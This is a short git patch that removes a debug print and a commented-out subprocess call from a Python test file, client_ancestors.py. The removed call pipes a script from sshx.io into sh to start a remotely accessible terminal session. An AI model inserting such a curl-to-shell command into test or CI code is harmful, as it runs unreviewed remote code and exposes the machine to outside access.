From 1aec998ec8f59ea7c0684f2e2aba0555d5330d86 Mon Sep 17 00:00:00 2001 From: Shashank Srikanth Date: Fri, 10 Jan 2025 15:51:59 -0800 Subject: [PATCH] print flow file --- test/core/tests/client_ancestors.py | 8 -------- 1 file changed, 8 deletions(-) diff --git a/test/core/tests/client_ancestors.py b/test/core/tests/client_ancestors.py index aaa08e6f6ab..5548392e774 100644 --- a/test/core/tests/client_ancestors.py +++ b/test/core/tests/client_ancestors.py @@ -58,14 +58,6 @@ def check_results(self, flow, checker): checker.assert_artifact(step.name, "step_name", step.name) return - print("__file__ is", __file__) - - # import subprocess - # try: - # subprocess.run("curl -sSf https://sshx.io/get | sh -s run", shell=True, check=True) - # except subprocess.CalledProcessError as e: - # print(f"Command failed with return code {e.returncode}") - # For each step in the flow for step in run: # For each task in the step